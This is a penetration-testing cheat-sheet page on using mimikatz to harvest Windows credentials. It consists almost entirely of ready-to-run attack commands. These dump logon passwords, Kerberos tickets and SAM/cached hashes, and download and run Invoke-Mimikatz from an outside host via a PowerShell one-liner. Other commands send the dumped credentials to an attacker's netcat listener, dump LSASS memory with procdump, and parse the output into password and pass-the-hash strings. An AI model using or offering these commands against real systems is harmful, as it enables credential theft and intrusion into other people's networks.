mimikatz

Basic Commands

# Lists all available provider credentials. 
# This usually shows recently logged on user and computer credentials

CMD> mimikatz.exe 
mimikatz # privilege::debug 
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets 

# List all SAM info

mimikatz # token::elevate
mimikatz # lsadump::sam
mimikatz # lsadump::cache 

# Powrshell based mimikatz
CMD> powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.35/post/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

PS> IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.35/post/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds

Output to Kali

# Kali

nc -nlvp 1234 > mimikatz_out.txt

# Target Windows

.\mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc64.exe -vv 10.10.14.35 1234

# Print username

cat mimikatz_out.txt|tr -d '\011\015' |awk '/Username/ { user=$0; getline; getline; print user " " $0}'|grep -v "* LM\|* NTLM\|Microsoft_OC1\|* Password : (null)"|awk '{if (length($8)>2) print $4 ":" $8}'|sort -u

# Print hash

cat mimikatz_out.txt |tr -d '\011\015' |awk '/Username/ { user=$0; getline; domain=$0; getline; print user " " domain " " $0}'|grep -v "* LM\|* Password\|Microsoft_OC1"|awk '{if (length($12)>2) print $8 "/" $4 "%aad3b435b51404eeaad3b435b51404ee:" $12}'|sort -u

Procdump to mimikatz

# https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

CMD> procdump -accepteula -ma lsass.exe lsass.dmp
CMD > mimikatz.exe 
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords

PreviousSecrentsdump.py Nextmeterpreter - mimikatz

Last updated 1 year ago